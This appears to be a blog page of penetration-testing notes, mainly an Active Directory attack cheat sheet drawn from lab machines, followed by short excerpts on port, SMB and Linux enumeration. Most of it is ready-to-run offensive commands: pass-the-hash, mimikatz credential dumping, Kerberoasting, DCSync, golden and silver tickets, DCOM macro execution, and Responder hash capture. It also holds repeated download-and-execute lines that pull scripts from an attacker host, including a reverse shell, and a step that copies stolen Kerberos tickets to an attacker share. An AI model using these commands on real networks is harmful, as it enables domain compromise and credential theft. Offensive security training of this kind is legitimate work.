Author: usafitz

Active Directory

RUNDOWN OF USEFUL TECHNIQUES

======================================================

TGT USE WITH AUTHENTICATION

└─$ kerbrute -dc-ip 10.10.1.299 -domain domain.com -user user01 -password password12345
└─$ KRB5CCNAME=user01.ccache impacket-psexec -k -no-pass domain.com/[email protected]

======================================================

CONNECTIONS VIA CRACKMAPEXEC PTH EVIL-WINRM

FIND ACCOUNT LOCKOUT ATTEMPTS IF ABLE: 
PS C:\Users\computer.corp> net accounts

└─$ crackmapexec smb 10.10.1.299 -u user01 -p password12345

└─$ crackmapexec smb 10.10.1.299 -u user01 -p password12345 -M mimikatz

└─$ crackmapexec smb 10.10.1.299 -u administrator -H'ee0e207898a5beee01f38115019ee2fb' --local-auth --sam

└─$ pth-winexe -U Administrator%ee0e207898a5beee01f38115019ee2fb:ee0e207898a5beee01f38115019ee2fb //10.10.1.299 cmd

└─$ evil-winrm -u user03 -p password12345 -i 10.10.1.299

└─$ xfreerdp /u:user04 /d:domain.com /p:user04:password12345 /v:10.10.1.299

└─$ rdesktop 10.10.1.299 -u user03 -p password12345

C:\tmp>.\psexec.exe \\dc-dc01 cmd.exe (MAYBE...)
THE PTH OPENS A SHELL ON THE DESKTOP, SO REMOTE IN TO DO THIS

mimikatz # sekurlsa::pth /user:user05_admin /domain:corp.com /ntlm:e2b475e11da2a0748290d87ee966e327 /run:PowerShell.exe

======================================================

SCRIPTS

SERVICE ACCOUNTS
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/svc_script.ps1')

LIST USERS
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/users_script.ps1')

LIST EVERYTHING
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/all_script.ps1')

SPECIFY A NAME BY CHANGING THE SCRIPT
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/specific_name_script.ps1')

POWERVIEW
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/PowerView.ps1')

CHECK CREDENTIALS BY CHANGING THE SCRIPT
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/credentials_script.ps1') <-- ONLY TO VERIFY

KERBEROAST
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/Invoke-Kerberoast.ps1')

REVERSE SHELL (NISHANG)
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/Invoke-PowerShellTcp.ps1')

======================================================

KERBEROAST - NEED PRIV'D ACCOUNT (LIKE ADMINISTRATOR)

IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/Invoke-Kerberoast.ps1')

Invoke-Kerberoast -outputformat hashcat | fl
└─$ hashcat -m 13100 svc.hash /usr/share/wordlists/rockyou.txt

======================================================

CREATE REVERSE DNS ENTRY ON THE DC (FROM HTB INTELLIGENCE)

python3 dnstool.py -u 'intelligence\tiffany.molina' -p NewIntelligenceCorpUser9876 -r webstuff.intelligence.htb -a add -t A -d 10.10.14.9 10.129.95.154

VERIFY
└─$ nslookup   
> server 10.129.95.154
> webstuff.intelligence.htb

======================================================

IF YOU SEE GMSA PRIVILEGES (FROM HTB INTELLIGENCE)

└─$ python3 gMSADumper.py -u 'ted.graves' -p Mr.Teddy -d intelligence.htb

LOOKING FOR SERVICE ACCOUNT HASH DUMPS

THIS DUMPS THE HASH FOR THE SERVICE ACCOUNT
svc_int$:::16cba97b4bc423795585b0b4bcee5047

======================================================

TIME SYNC

└─$ timedatectl set-ntp false
└─$ sudo rdate -n dc.intelligence.htb

OPTIONAL: sudo ntpdate 10.129.95.154

======================================================

DC SYNC

mimikatz # lsadump::dcsync /user:Administrator

======================================================

SILVER TICKET

USING SERVICE ACCOUNT DISCOVERED USING GMSA (svc_int$)

└─$ impacket-getST -spn www/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int -hashes HASH:HASH

└─$ KRB5CCNAME=Administrator.ccache impacket-psexec -k -no-pass intelligence.htb/[email protected]

======================================================

GOLDEN BUT NOT GOLDEN TICKET

C:\>whoami /user (LOOKING FOR SID)

mimikatz # kerberos::purge
mimikatz # kerberos::list
mimikatz # kerberos::golden /user:user02 /domain:corp.com /sid:S-1-5-21-1602875587-2787523311-2555479668 /target:CorpWebServer.corp.com /service:HTTP /rc4:e2b475e11da2a0748290d87ee966e327 /ptt

mimikatz # kerberos::list

READOUT TO GOLDEN:  /user /domain /sid /target /service:HTTP /rc4

NOTE: CAN'T DO THIS WITH CLEAR-TEXT PASSWORD... MUST HASH FIRST

======================================================

GOLDEN TICKET

C:\Tools\active_directory> psexec.exe \\dc01 cmd.exe
ACCESS DENIED WHICH CACHES THE HASH

mimikatz # privilege::debug
mimikatz # lsadump::lsa /patch
mimikatz # kerberos::purge
mimikatz # kerberos::golden /user:fakeuser /domain:corp.com /sid:S-1-5-21-1602875587-2787523311-2599470068 /krbtgt:75b60230a2394a812000dbfad8415965 /ptt
mimikatz # misc::cmd

C:\Users\user02.crop> psexec.exe \\dc01 cmd.exe

======================================================

DCOM - DISTRIBUTED COMPONENT OBJECT MODEL (LATERAL MOVEMENT)
SHOW AVAILABLE METHODS - LOOKING FOR RUN AND WORKBOOK

$com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application", "192.168.1.110"))
$com | Get-Member

CREATE VBA MACRO (SHELL CODE GOES IN PLACE OF NOTEPAD)
Sub mymacro()
    Shell ("notepad.exe")
End Sub

SCRIPT TO RUN, WILL CONNECT AND RUN THE MACRO
$Path = "\\192.168.1.110\c$\Windows\sysWOW64\config\systemprofile\Desktop"
$temp = [system.io.directory]::createDirectory($Path)
$com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application", "192.168.1.110"))
$LocalPath = "C:\Users\user05_admin.corp\myexcel.xls"
$RemotePath = "\\192.168.1.110\c$\myexcel.xls"
[System.IO.File]::Copy($LocalPath, $RemotePath, $True)
$Path = "\\192.168.1.110\c$\Windows\sysWOW64\config\systemprofile\Desktop"
$temp = [system.io.directory]::createDirectory($Path)
$Workbook = $com.Workbooks.Open("C:\myexcel.xls")
$com.Run("mymacro")

======================================================

SERVICE TICKET REQUEST
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::tickets

PS C:\tmp> Add-Type -AssemblyName System.IdentityModel
PS C:\tmp> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'HTTP/MSSQL.domain.com'
PS C:\tmp> klist

THEN MIMIKATS
sekurlsa::tickets - we see the ticket for HTTP
kerberos::list /export

THEN SEND THE FILE TO ATTACK COMPUTER
PS C:\tmp> copy .\[email protected]~MSSQL.domain.com-SVCORP.COM.kirbi \\192.168.119.299\share\

THEN CRACK
└─$ ./tgsrepcrack.py /usr/share/wordlists/rockyou.txt mssql.kirbi

CRACK WITH JOHN OR HASHCAT
kirbi2john mssql.kirbi > mssql.hash
john mssql.hash
hashcat -m 5600 user04.hash /usr/share/wordlists/rockyou.txt

======================================================

POWERVIEW

IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/PowerView.ps1')

Get-NetSession -ComputerName client06 (WORKED)

Get-NetLoggedon -ComputerName client06 (WORKED)

======================================================

RESPONDER
└─$ sudo responder -I tun0

THEN REQUEST SMB FILE SHARES VIA AUTHENTICATION
PS C:\tmp\tickets> net use \\192.168.119.299\share /USER:domain.com\user04

ON REMOTE DESKTOP, THIS WORKED, RESPONDER GOT THE RIGHT HASH!!!
PS C:\tmp\tickets> net use \\192.168.119.299\share

MAY ASK FOR USERNAME/PASS... JUST QUIT OUT OF IT (or use domain.com\user03)

======================================================

BLOODHOUND
└─$ python3 /opt/opt/BloodHound.py/bloodhound.py -ns 10.10.1.299 -d domain.com -dc dc-dc02.domain.com -u user03 -p password12345 -c All

sudo neo4j console

BLOUDHOUND GUI - CHANGE PASSWORD http://localhost:7474

bloodhound

IMPORT THE JSON FILES

======================================================

SMB FILE MOVEMENT

AUTHENTICATE: PS C:\tmp\tickets> net use \\192.168.119.299\share student /USER:student

MOVE FILES: PS C:\tmp\tickets> copy .\FILE.kirbi \\192.168.119.299\share\

TO STOP THE SHARE:  net use \\192.168.119.299\share /DELETE

======================================================

AD SCRIPT REFERENCE
ALL ACCOUNTS
-------------------
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/all_script.ps1')
-------------------
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="samAccountType=805306368"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
	Foreach($prop in $obj.Properties)
		{
			$prop
		}
	Write-Host "------------------------"
}


AD SCRIPT REFERENCE
SERVICE ACCOUNTS
-------------------
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/svc_script.ps1')
-------------------
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="serviceprincipalname=*http*"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
    Foreach($prop in $obj.Properties)
    {
        $prop
    }
}


AD SCRIPT REFERENCE
LIST USERS
-------------------
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/users_script.ps1')
-------------------
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="samAccountType=805306368"
$Searcher.FindAll()


AD SCRIPT REFERENCE
CHANGE SCRIPT TO GET A CERTAIN NAME
-------------------
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/specific_name_script.ps1')
-------------------
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="name=Domain Admins"
$Searcher.FindAll()

Attack Tools

ATTACK TOOLS

…tools and uses vary
…take a look at the use of each before attempting

Continue reading

Web Server Enumeration

WEB
PORT 80
PORT 443

…web server ports are not limited to these, look for open http services
…multiple attack vectors

Continue reading

Ports and Explanations

These are the most common ports found in scans…
The following lists number, use, and effective enumeration tools…

PORTS QUICK REFERENCE (DESKTOP BROWSER)

-----------------------------------------------------------------------------
            - FIND AVAILABLE NETWORK CONNECTIONS
                nmap -sn -oG results.txt 10.X.X.0/24
-----------------------------------------------------------------------------
21          - FTP
            Try anonymous logins
-----------------------------------------------------------------------------
25          - SMTP (EMAIL)
                telnet 10.11.1.72 25
                VRFY user
                FINISH SESSION:  Ctl + ] / close
                VULN - SHELLSHOCK - need valid email address
                python2 postfix-shellshock-nc.py <ip> <email> LHOST LPORT
110         - POP
143         - IMAP
587         - SECURE EMAIL
                nc -nv 10.11.1.72 25
                nc -nvC 10.11.1.72 110
                USER enter-user
                PASS enter-pass
-----------------------------------------------------------------------------
80 / 443    - WEB
                dirb / dirbuster / gobuster / nikto / curl
                RFI / LFI / SQLI
-----------------------------------------------------------------------------
88 / 464    - KERBEROS
                pth-winexe -U WORKGROUP/User%Pass //10.11.1.220 cmd.exe
-----------------------------------------------------------------------------
111         - NFS mounts (showmount -a / -e)
-----------------------------------------------------------------------------
135         - RPC: Remote Procedure Call
                impacket-rpcdump
-----------------------------------------------------------------------------
139 / 445   - SMB (smbmap -H / smbclient -L / nmblookup -A / nbtscan)
                nmap --script nbstat.nse <ip>
                nmap --script smb-os-discovery  <ip>
                nmap --script smb-enum-shares -p139,445 <ip>
                nmap --script smb-vuln* <ip>
                'net' command on kali
                crackmapexec smb -u -p
                rpcclient -U '' -N
                impacket-lookupsid
                enum4linux
                ---------------------------------------------------------------
                CIFS (OLD WIND NT 4.0)
                SMB 1.0 / SMB1 - WIN2K / WINXP / WIN SRV 2003 WIN SRV 2003 R2
                SMB 2.0 / SMB2 - WIN VISTA / WIN SRV 2008
                SMB 2.1 / SMB2.1 - WIN 7 / WIN SRV 2008 R2
                SMB 3.0 / SMB3 - WIN 8 / WIN SRV 2012
                SMB 3.02 / SMB3 - WIN 8.1 / WIN SRV 2012 R2
                SMB 3.1 / SMB 3.1.1 (SECURE NEGOTIATION) - WIN SRV 2016 / WIN 10
-----------------------------------------------------------------------------
1433        - MSSQL
                nmap --script ms-sql* -p1433
                sqsh -S 10.11.1.31 -U sa
-----------------------------------------------------------------------------
389 / 3268  - LDAP (INDICATOR OF DC)
                nmap -sT -Pn -n --open <ip> -p389 --script ldap-rootdse 
                nmap -p 389 --script ldap-search <ip>
                dig srv _ldap._tcp.dc._msdcs.<FULL-DOMAIN-NAME> @10.11.1.220 
                impacket-GetNPUsers thinc/10.11.1.220 -dc-ip 10.11.1.220 -request
-----------------------------------------------------------------------------   
3389        - RDP
            rdesktop -u <user> -p <pass> <host>
-----------------------------------------------------------------------------
5985 / 5986 - WINRM
            evil-winrm -u <user> -p <pass> -i <host>
-----------------------------------------------------------------------------
Continue reading

Generic Remote Enumeration

All listed items are separate commands unless otherwise specified…

NMAP - STANDARD FIRST APPROACH

…if sudo is required, it will let you know
…otherwise, just use the pasted command

nmap -A -T4 -p- -sS -O -oN nmap_10.10.1.299.txt ip
nmap -A -T4 -p- -sS -OA -oN nmap_10.10.1.299.txt ip
nmap -sU --top-ports 100 -vv ip
nmap -sV -vv -p <ports> --script vuln ip
Continue reading

SQL & SQL Injection

All commands listed here assumes you have a command prompt…
All listed items are separate commands unless otherwise specified…

RESOURCES TO USE DURING TESTING

this is a MSSQL Practical Injection cheat sheet
this is another SQL injection sheet
this is a list of escape characters
…there are plenty more online

Continue reading

Linux System Enumeration

All commands listed here assumes you have a command prompt…
All listed items are separate commands unless otherwise specified…

SIMPLE LINUX ENUMERATION

cat ~/.bash_history
cat /etc/issue
cat /proc/version
whoami
ifconfig
ip addr
hostname
pwd
ls -alh /var/www/html
cat wpconfig.php
Continue reading

SMB Server Enumeration

FIND SMB VERSION

…this can be done using wireshark
…or the techniques seen below

SMB1 – Windows 2000, XP and Windows 2003
SMB2 – Windows Vista SP1 and Windows 2008
SMB2.1 – Windows 7 and Windows 2008 R2
SMB3 – Windows 8 and Windows 2012.

enum4linux -a ip
nbtscan ip

…keeping this for reference… used in a particular technique for SMB v2

sudo ngrep -i -d tun0 's.?a.?m.?b.?a.*[[:digit:]]'
# THEN GIVES OUTPUT... LOOK FOR VERSION NUMBERS
interface: tun0 (192.168.119.0/255.255.255.0)
filter: (ip || ip6)
match (JIT): s.?a.?m.?b.?a.*[[:digit:]]
T 192.168.119.299:36106 -> 10.11.10.299:139 [AP] #10
  .....SMBr.....C.........................MICROSOFT NETWORKS 3.0..LANMAN1.0..LM1.2X002..DOS LANMAN2.1..LANMAN2.1..Samba..NT LANMAN 1.0..NT LM 0.12..SMB 2.002..SMB 2.???.
Continue reading

FTP Server Enumeration

AUTOMATIC LOGON

~/.netrc
Continue reading
Scroll to top